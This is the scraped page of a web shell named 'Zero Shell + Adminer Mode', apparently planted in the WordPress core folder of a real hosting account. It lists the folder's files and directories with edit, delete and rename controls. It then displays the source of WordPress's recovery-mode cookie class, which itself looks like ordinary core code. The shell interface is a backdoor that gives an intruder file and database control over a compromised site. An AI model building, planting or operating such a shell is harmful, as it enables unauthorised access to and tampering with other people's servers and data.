Zero Shell + Adminer Mode
📂 Path: /home/consultoriananan/public_html/wp-includes/
[DIR ] ID3 [ delete | rename ]
[DIR ] IXR [ delete | rename ]
[DIR ] PHPMailer [ delete | rename ]
[DIR ] Requests [ delete | rename ]
[DIR ] SimplePie [ delete | rename ]
[DIR ] Text [ delete | rename ]
[DIR ] assets [ delete | rename ]
[DIR ] block-bindings [ delete | rename ]
[DIR ] block-patterns [ delete | rename ]
[DIR ] block-supports [ delete | rename ]
[DIR ] blocks [ delete | rename ]
[DIR ] certificates [ delete | rename ]
[DIR ] css [ delete | rename ]
[DIR ] customize [ delete | rename ]
[DIR ] fonts [ delete | rename ]
[DIR ] html-api [ delete | rename ]
[DIR ] images [ delete | rename ]
[DIR ] interactivity-api [ delete | rename ]
[DIR ] js [ delete | rename ]
[DIR ] l10n [ delete | rename ]
[DIR ] php-compat [ delete | rename ]
[DIR ] pomo [ delete | rename ]
[DIR ] rest-api [ delete | rename ]
[DIR ] sitemaps [ delete | rename ]
[DIR ] sodium_compat [ delete | rename ]
[DIR ] style-engine [ delete | rename ]
[DIR ] theme-compat [ delete | rename ]
[DIR ] widgets [ delete | rename ]
[FILE] admin-bar.php [ edit | delete | rename ]
[FILE] atomlib.php [ edit | delete | rename ]
[FILE] author-template.php [ edit | delete | rename ]
[FILE] block-bindings.php [ edit | delete | rename ]
[FILE] block-editor.php [ edit | delete | rename ]
[FILE] block-i18n.json [ edit | delete | rename ]
[FILE] block-patterns.php [ edit | delete | rename ]
[FILE] block-template-utils.php [ edit | delete | rename ]
[FILE] block-template.php [ edit | delete | rename ]
[FILE] blocks.php [ edit | delete | rename ]
[FILE] bookmark-template.php [ edit | delete | rename ]
[FILE] bookmark.php [ edit | delete | rename ]
[FILE] cache-compat.php [ edit | delete | rename ]
[FILE] cache.php [ edit | delete | rename ]
[FILE] canonical.php [ edit | delete | rename ]
[FILE] capabilities.php [ edit | delete | rename ]
[FILE] category-template.php [ edit | delete | rename ]
[FILE] category.php [ edit | delete | rename ]
[FILE] class-IXR.php [ edit | delete | rename ]
[FILE] class-avif-info.php [ edit | delete | rename ]
[FILE] class-feed.php [ edit | delete | rename ]
[FILE] class-http.php [ edit | delete | rename ]
[FILE] class-json.php [ edit | delete | rename ]
[FILE] class-oembed.php [ edit | delete | rename ]
[FILE] class-phpass.php [ edit | delete | rename ]
[FILE] class-phpmailer.php [ edit | delete | rename ]
[FILE] class-pop3.php [ edit | delete | rename ]
[FILE] class-requests.php [ edit | delete | rename ]
[FILE] class-simplepie.php [ edit | delete | rename ]
[FILE] class-smtp.php [ edit | delete | rename ]
[FILE] class-snoopy.php [ edit | delete | rename ]
[FILE] class-walker-category-dropdown.php [ edit | delete | rename ]
[FILE] class-walker-category.php [ edit | delete | rename ]
[FILE] class-walker-comment.php [ edit | delete | rename ]
[FILE] class-walker-nav-menu.php [ edit | delete | rename ]
[FILE] class-walker-page-dropdown.php [ edit | delete | rename ]
[FILE] class-walker-page.php [ edit | delete | rename ]
[FILE] class-wp-admin-bar.php [ edit | delete | rename ]
[FILE] class-wp-ajax-response.php [ edit | delete | rename ]
[FILE] class-wp-application-passwords.php [ edit | delete | rename ]
[FILE] class-wp-block-bindings-registry.php [ edit | delete | rename ]
[FILE] class-wp-block-bindings-source.php [ edit | delete | rename ]
[FILE] class-wp-block-editor-context.php [ edit | delete | rename ]
[FILE] class-wp-block-list.php [ edit | delete | rename ]
[FILE] class-wp-block-metadata-registry.php [ edit | delete | rename ]
[FILE] class-wp-block-parser-block.php [ edit | delete | rename ]
[FILE] class-wp-block-parser-frame.php [ edit | delete | rename ]
[FILE] class-wp-block-parser.php [ edit | delete | rename ]
[FILE] class-wp-block-pattern-categories-registry.php [ edit | delete | rename ]
[FILE] class-wp-block-patterns-registry.php [ edit | delete | rename ]
[FILE] class-wp-block-styles-registry.php [ edit | delete | rename ]
[FILE] class-wp-block-supports.php [ edit | delete | rename ]
[FILE] class-wp-block-template.php [ edit | delete | rename ]
[FILE] class-wp-block-templates-registry.php [ edit | delete | rename ]
[FILE] class-wp-block-type-registry.php [ edit | delete | rename ]
[FILE] class-wp-block-type.php [ edit | delete | rename ]
[FILE] class-wp-block.php [ edit | delete | rename ]
[FILE] class-wp-classic-to-block-menu-converter.php [ edit | delete | rename ]
[FILE] class-wp-comment-query.php [ edit | delete | rename ]
[FILE] class-wp-comment.php [ edit | delete | rename ]
[FILE] class-wp-customize-control.php [ edit | delete | rename ]
[FILE] class-wp-customize-manager.php [ edit | delete | rename ]
[FILE] class-wp-customize-nav-menus.php [ edit | delete | rename ]
[FILE] class-wp-customize-panel.php [ edit | delete | rename ]
[FILE] class-wp-customize-section.php [ edit | delete | rename ]
[FILE] class-wp-customize-setting.php [ edit | delete | rename ]
[FILE] class-wp-customize-widgets.php [ edit | delete | rename ]
[FILE] class-wp-date-query.php [ edit | delete | rename ]
[FILE] class-wp-dependencies.php [ edit | delete | rename ]
[FILE] class-wp-dependency.php [ edit | delete | rename ]
[FILE] class-wp-duotone.php [ edit | delete | rename ]
[FILE] class-wp-editor.php [ edit | delete | rename ]
[FILE] class-wp-embed.php [ edit | delete | rename ]
[FILE] class-wp-error.php [ edit | delete | rename ]
[FILE] class-wp-exception.php [ edit | delete | rename ]
[FILE] class-wp-fatal-error-handler.php [ edit | delete | rename ]
[FILE] class-wp-feed-cache-transient.php [ edit | delete | rename ]
[FILE] class-wp-feed-cache.php [ edit | delete | rename ]
[FILE] class-wp-hook.php [ edit | delete | rename ]
[FILE] class-wp-http-cookie.php [ edit | delete | rename ]
[FILE] class-wp-http-curl.php [ edit | delete | rename ]
[FILE] class-wp-http-encoding.php [ edit | delete | rename ]
[FILE] class-wp-http-ixr-client.php [ edit | delete | rename ]
[FILE] class-wp-http-proxy.php [ edit | delete | rename ]
[FILE] class-wp-http-requests-hooks.php [ edit | delete | rename ]
[FILE] class-wp-http-requests-response.php [ edit | delete | rename ]
[FILE] class-wp-http-response.php [ edit | delete | rename ]
[FILE] class-wp-http-streams.php [ edit | delete | rename ]
[FILE] class-wp-http.php [ edit | delete | rename ]
[FILE] class-wp-image-editor-gd.php [ edit | delete | rename ]
[FILE] class-wp-image-editor-imagick.php [ edit | delete | rename ]
[FILE] class-wp-image-editor.php [ edit | delete | rename ]
[FILE] class-wp-list-util.php [ edit | delete | rename ]
[FILE] class-wp-locale-switcher.php [ edit | delete | rename ]
[FILE] class-wp-locale.php [ edit | delete | rename ]
[FILE] class-wp-matchesmapregex.php [ edit | delete | rename ]
[FILE] class-wp-meta-query.php [ edit | delete | rename ]
[FILE] class-wp-metadata-lazyloader.php [ edit | delete | rename ]
[FILE] class-wp-navigation-fallback.php [ edit | delete | rename ]
[FILE] class-wp-network-query.php [ edit | delete | rename ]
[FILE] class-wp-network.php [ edit | delete | rename ]
[FILE] class-wp-object-cache.php [ edit | delete | rename ]
[FILE] class-wp-oembed-controller.php [ edit | delete | rename ]
[FILE] class-wp-oembed.php [ edit | delete | rename ]
[FILE] class-wp-paused-extensions-storage.php [ edit | delete | rename ]
[FILE] class-wp-plugin-dependencies.php [ edit | delete | rename ]
[FILE] class-wp-post-type.php [ edit | delete | rename ]
[FILE] class-wp-post.php [ edit | delete | rename ]
[FILE] class-wp-query.php [ edit | delete | rename ]
[FILE] class-wp-recovery-mode-cookie-service.php [ edit | delete | rename ]
[FILE] class-wp-recovery-mode-email-service.php [ edit | delete | rename ]
[FILE] class-wp-recovery-mode-key-service.php [ edit | delete | rename ]
[FILE] class-wp-recovery-mode-link-service.php [ edit | delete | rename ]
[FILE] class-wp-recovery-mode.php [ edit | delete | rename ]
[FILE] class-wp-rewrite.php [ edit | delete | rename ]
[FILE] class-wp-role.php [ edit | delete | rename ]
[FILE] class-wp-roles.php [ edit | delete | rename ]
[FILE] class-wp-script-modules.php [ edit | delete | rename ]
[FILE] class-wp-scripts.php [ edit | delete | rename ]
[FILE] class-wp-session-tokens.php [ edit | delete | rename ]
[FILE] class-wp-simplepie-file.php [ edit | delete | rename ]
[FILE] class-wp-simplepie-sanitize-kses.php [ edit | delete | rename ]
[FILE] class-wp-site-query.php [ edit | delete | rename ]
[FILE] class-wp-site.php [ edit | delete | rename ]
[FILE] class-wp-styles.php [ edit | delete | rename ]
[FILE] class-wp-tax-query.php [ edit | delete | rename ]
[FILE] class-wp-taxonomy.php [ edit | delete | rename ]
[FILE] class-wp-term-query.php [ edit | delete | rename ]
[FILE] class-wp-term.php [ edit | delete | rename ]
[FILE] class-wp-text-diff-renderer-inline.php [ edit | delete | rename ]
[FILE] class-wp-text-diff-renderer-table.php [ edit | delete | rename ]
[FILE] class-wp-textdomain-registry.php [ edit | delete | rename ]
[FILE] class-wp-theme-json-data.php [ edit | delete | rename ]
[FILE] class-wp-theme-json-resolver.php [ edit | delete | rename ]
[FILE] class-wp-theme-json-schema.php [ edit | delete | rename ]
[FILE] class-wp-theme-json.php [ edit | delete | rename ]
[FILE] class-wp-theme.php [ edit | delete | rename ]
[FILE] class-wp-token-map.php [ edit | delete | rename ]
[FILE] class-wp-user-meta-session-tokens.php [ edit | delete | rename ]
[FILE] class-wp-user-query.php [ edit | delete | rename ]
[FILE] class-wp-user-request.php [ edit | delete | rename ]
[FILE] class-wp-user.php [ edit | delete | rename ]
[FILE] class-wp-walker.php [ edit | delete | rename ]
[FILE] class-wp-widget-factory.php [ edit | delete | rename ]
[FILE] class-wp-widget.php [ edit | delete | rename ]
[FILE] class-wp-xmlrpc-server.php [ edit | delete | rename ]
[FILE] class-wp.php [ edit | delete | rename ]
[FILE] class-wpdb.php [ edit | delete | rename ]
[FILE] class.wp-dependencies.php [ edit | delete | rename ]
[FILE] class.wp-scripts.php [ edit | delete | rename ]
[FILE] class.wp-styles.php [ edit | delete | rename ]
[FILE] comment-template.php [ edit | delete | rename ]
[FILE] comment.php [ edit | delete | rename ]
[FILE] compat.php [ edit | delete | rename ]
[FILE] cron.php [ edit | delete | rename ]
[FILE] date.php [ edit | delete | rename ]
[FILE] default-constants.php [ edit | delete | rename ]
[FILE] default-filters.php [ edit | delete | rename ]
[FILE] default-widgets.php [ edit | delete | rename ]
[FILE] deprecated.php [ edit | delete | rename ]
[FILE] embed-template.php [ edit | delete | rename ]
[FILE] embed.php [ edit | delete | rename ]
[FILE] error-protection.php [ edit | delete | rename ]
[FILE] feed-atom-comments.php [ edit | delete | rename ]
[FILE] feed-atom.php [ edit | delete | rename ]
[FILE] feed-rdf.php [ edit | delete | rename ]
[FILE] feed-rss.php [ edit | delete | rename ]
[FILE] feed-rss2-comments.php [ edit | delete | rename ]
[FILE] feed-rss2.php [ edit | delete | rename ]
[FILE] feed.php [ edit | delete | rename ]
[FILE] fonts.php [ edit | delete | rename ]
[FILE] formatting.php [ edit | delete | rename ]
[FILE] functions.php [ edit | delete | rename ]
[FILE] functions.wp-scripts.php [ edit | delete | rename ]
[FILE] functions.wp-styles.php [ edit | delete | rename ]
[FILE] general-template.php [ edit | delete | rename ]
[FILE] global-styles-and-settings.php [ edit | delete | rename ]
[FILE] http.php [ edit | delete | rename ]
[FILE] https-detection.php [ edit | delete | rename ]
[FILE] https-migration.php [ edit | delete | rename ]
[FILE] kses.php [ edit | delete | rename ]
[FILE] l10n.php [ edit | delete | rename ]
[FILE] link-template.php [ edit | delete | rename ]
[FILE] load.php [ edit | delete | rename ]
[FILE] locale.php [ edit | delete | rename ]
[FILE] media-template.php [ edit | delete | rename ]
[FILE] media.php [ edit | delete | rename ]
[FILE] meta.php [ edit | delete | rename ]
[FILE] ms-blogs.php [ edit | delete | rename ]
[FILE] ms-default-constants.php [ edit | delete | rename ]
[FILE] ms-default-filters.php [ edit | delete | rename ]
[FILE] ms-deprecated.php [ edit | delete | rename ]
[FILE] ms-files.php [ edit | delete | rename ]
[FILE] ms-functions.php [ edit | delete | rename ]
[FILE] ms-load.php [ edit | delete | rename ]
[FILE] ms-network.php [ edit | delete | rename ]
[FILE] ms-settings.php [ edit | delete | rename ]
[FILE] ms-site.php [ edit | delete | rename ]
[FILE] nav-menu-template.php [ edit | delete | rename ]
[FILE] nav-menu.php [ edit | delete | rename ]
[FILE] option.php [ edit | delete | rename ]
[FILE] pluggable-deprecated.php [ edit | delete | rename ]
[FILE] pluggable.php [ edit | delete | rename ]
[FILE] plugin.php [ edit | delete | rename ]
[FILE] post-formats.php [ edit | delete | rename ]
[FILE] post-template.php [ edit | delete | rename ]
[FILE] post-thumbnail-template.php [ edit | delete | rename ]
[FILE] post.php [ edit | delete | rename ]
[FILE] query.php [ edit | delete | rename ]
[FILE] registration-functions.php [ edit | delete | rename ]
[FILE] registration.php [ edit | delete | rename ]
[FILE] rest-api.php [ edit | delete | rename ]
[FILE] revision.php [ edit | delete | rename ]
[FILE] rewrite.php [ edit | delete | rename ]
[FILE] robots-template.php [ edit | delete | rename ]
[FILE] rss-functions.php [ edit | delete | rename ]
[FILE] rss.php [ edit | delete | rename ]
[FILE] script-loader.php [ edit | delete | rename ]
[FILE] script-modules.php [ edit | delete | rename ]
[FILE] session.php [ edit | delete | rename ]
[FILE] shortcodes.php [ edit | delete | rename ]
[FILE] sitemaps.php [ edit | delete | rename ]
[FILE] spl-autoload-compat.php [ edit | delete | rename ]
[FILE] style-engine.php [ edit | delete | rename ]
[FILE] taxonomy.php [ edit | delete | rename ]
[FILE] template-canvas.php [ edit | delete | rename ]
[FILE] template-loader.php [ edit | delete | rename ]
[FILE] template.php [ edit | delete | rename ]
[FILE] theme-i18n.json [ edit | delete | rename ]
[FILE] theme-previews.php [ edit | delete | rename ]
[FILE] theme-templates.php [ edit | delete | rename ]
[FILE] theme.json [ edit | delete | rename ]
[FILE] theme.php [ edit | delete | rename ]
[FILE] update.php [ edit | delete | rename ]
[FILE] user.php [ edit | delete | rename ]
[FILE] vars.php [ edit | delete | rename ]
[FILE] version.php [ edit | delete | rename ]
[FILE] widgets.php [ edit | delete | rename ]
[FILE] wp-db.php [ edit | delete | rename ]
[FILE] wp-diff.php [ edit | delete | rename ]
Viewing: class-wp-recovery-mode-cookie-service.php
<?php
/**
* Error Protection API: WP_Recovery_Mode_Cookie_Service class
*
* @package WordPress
* @since 5.2.0
*/
/**
* Core class used to set, validate, and clear cookies that identify a Recovery Mode session.
*
* @since 5.2.0
*/
#[AllowDynamicProperties]
final class WP_Recovery_Mode_Cookie_Service {
/**
* Checks whether the recovery mode cookie is set.
*
* @since 5.2.0
*
* @return bool True if the cookie is set, false otherwise.
*/
public function is_cookie_set() {
return ! empty( $_COOKIE[ RECOVERY_MODE_COOKIE ] );
}
/**
* Sets the recovery mode cookie.
*
* This must be immediately followed by exiting the request.
*
* @since 5.2.0
*/
public function set_cookie() {
$value = $this->generate_cookie();
/**
* Filters the length of time a Recovery Mode cookie is valid for.
*
* @since 5.2.0
*
* @param int $length Length in seconds.
*/
$length = apply_filters( 'recovery_mode_cookie_length', WEEK_IN_SECONDS );
$expire = time() + $length;
setcookie( RECOVERY_MODE_COOKIE, $value, $expire, COOKIEPATH, COOKIE_DOMAIN, is_ssl(), true );
if ( COOKIEPATH !== SITECOOKIEPATH ) {
setcookie( RECOVERY_MODE_COOKIE, $value, $expire, SITECOOKIEPATH, COOKIE_DOMAIN, is_ssl(), true );
}
}
/**
* Clears the recovery mode cookie.
*
* @since 5.2.0
*/
public function clear_cookie() {
setcookie( RECOVERY_MODE_COOKIE, ' ', time() - YEAR_IN_SECONDS, COOKIEPATH, COOKIE_DOMAIN );
setcookie( RECOVERY_MODE_COOKIE, ' ', time() - YEAR_IN_SECONDS, SITECOOKIEPATH, COOKIE_DOMAIN );
}
/**
* Validates the recovery mode cookie.
*
* @since 5.2.0
*
* @param string $cookie Optionally specify the cookie string.
* If omitted, it will be retrieved from the super global.
* @return true|WP_Error True on success, error object on failure.
*/
public function validate_cookie( $cookie = '' ) {
if ( ! $cookie ) {
if ( empty( $_COOKIE[ RECOVERY_MODE_COOKIE ] ) ) {
return new WP_Error( 'no_cookie', __( 'No cookie present.' ) );
}
$cookie = $_COOKIE[ RECOVERY_MODE_COOKIE ];
}
$parts = $this->parse_cookie( $cookie );
if ( is_wp_error( $parts ) ) {
return $parts;
}
list( , $created_at, $random, $signature ) = $parts;
if ( ! ctype_digit( $created_at ) ) {
return new WP_Error( 'invalid_created_at', __( 'Invalid cookie format.' ) );
}
/** This filter is documented in wp-includes/class-wp-recovery-mode-cookie-service.php */
$length = apply_filters( 'recovery_mode_cookie_length', WEEK_IN_SECONDS );
if ( time() > $created_at + $length ) {
return new WP_Error( 'expired', __( 'Cookie expired.' ) );
}
$to_sign = sprintf( 'recovery_mode|%s|%s', $created_at, $random );
$hashed = $this->recovery_mode_hash( $to_sign );
if ( ! hash_equals( $signature, $hashed ) ) {
return new WP_Error( 'signature_mismatch', __( 'Invalid cookie.' ) );
}
return true;
}
/**
* Gets the session identifier from the cookie.
*
* The cookie should be validated before calling this API.
*
* @since 5.2.0
*
* @param string $cookie Optionally specify the cookie string.
* If omitted, it will be retrieved from the super global.
* @return string|WP_Error Session ID on success, or error object on failure.
*/
public function get_session_id_from_cookie( $cookie = '' ) {
if ( ! $cookie ) {
if ( empty( $_COOKIE[ RECOVERY_MODE_COOKIE ] ) ) {
return new WP_Error( 'no_cookie', __( 'No cookie present.' ) );
}
$cookie = $_COOKIE[ RECOVERY_MODE_COOKIE ];
}
$parts = $this->parse_cookie( $cookie );
if ( is_wp_error( $parts ) ) {
return $parts;
}
list( , , $random ) = $parts;
return sha1( $random );
}
/**
* Parses the cookie into its four parts.
*
* @since 5.2.0
*
* @param string $cookie Cookie content.
* @return array|WP_Error Cookie parts array, or error object on failure.
*/
private function parse_cookie( $cookie ) {
$cookie = base64_decode( $cookie );
$parts = explode( '|', $cookie );
if ( 4 !== count( $parts ) ) {
return new WP_Error( 'invalid_format', __( 'Invalid cookie format.' ) );
}
return $parts;
}
/**
* Generates the recovery mode cookie value.
*
* The cookie is a base64 encoded string with the following format:
*
* recovery_mode|iat|rand|signature
*
* Where "recovery_mode" is a constant string,
* iat is the time the cookie was generated at,
* rand is a randomly generated password that is also used as a session identifier
* and signature is an hmac of the preceding 3 parts.
*
* @since 5.2.0
*
* @return string Generated cookie content.
*/
private function generate_cookie() {
$to_sign = sprintf( 'recovery_mode|%s|%s', time(), wp_generate_password( 20, false ) );
$signed = $this->recovery_mode_hash( $to_sign );
return base64_encode( sprintf( '%s|%s', $to_sign, $signed ) );
}
/**
* Gets a form of `wp_hash()` specific to Recovery Mode.
*
* We cannot use `wp_hash()` because it is defined in `pluggable.php` which is not loaded until after plugins are loaded,
* which is too late to verify the recovery mode cookie.
*
* This tries to use the `AUTH` salts first, but if they aren't valid specific salts will be generated and stored.
*
* @since 5.2.0
*
* @param string $data Data to hash.
* @return string|false The hashed $data, or false on failure.
*/
private function recovery_mode_hash( $data ) {
$default_keys = array_unique(
array(
'put your unique phrase here',
/*
* translators: This string should only be translated if wp-config-sample.php is localized.
* You can check the localized release package or
* https://i18n.svn.wordpress.org/<locale code>/branches/<wp version>/dist/wp-config-sample.php
*/
__( 'put your unique phrase here' ),
)
);
if ( ! defined( 'AUTH_KEY' ) || in_array( AUTH_KEY, $default_keys, true ) ) {
$auth_key = get_site_option( 'recovery_mode_auth_key' );
if ( ! $auth_key ) {
if ( ! function_exists( 'wp_generate_password' ) ) {
require_once ABSPATH . WPINC . '/pluggable.php';
}
$auth_key = wp_generate_password( 64, true, true );
update_site_option( 'recovery_mode_auth_key', $auth_key );
}
} else {
$auth_key = AUTH_KEY;
}
if ( ! defined( 'AUTH_SALT' ) || in_array( AUTH_SALT, $default_keys, true ) || AUTH_SALT === $auth_key ) {
$auth_salt = get_site_option( 'recovery_mode_auth_salt' );
if ( ! $auth_salt ) {
if ( ! function_exists( 'wp_generate_password' ) ) {
require_once ABSPATH . WPINC . '/pluggable.php';
}
$auth_salt = wp_generate_password( 64, true, true );
update_site_option( 'recovery_mode_auth_salt', $auth_salt );
}
} else {
$auth_salt = AUTH_SALT;
}
$secret = $auth_key . $auth_salt;
return hash_hmac( 'sha1', $data, $secret );
}
}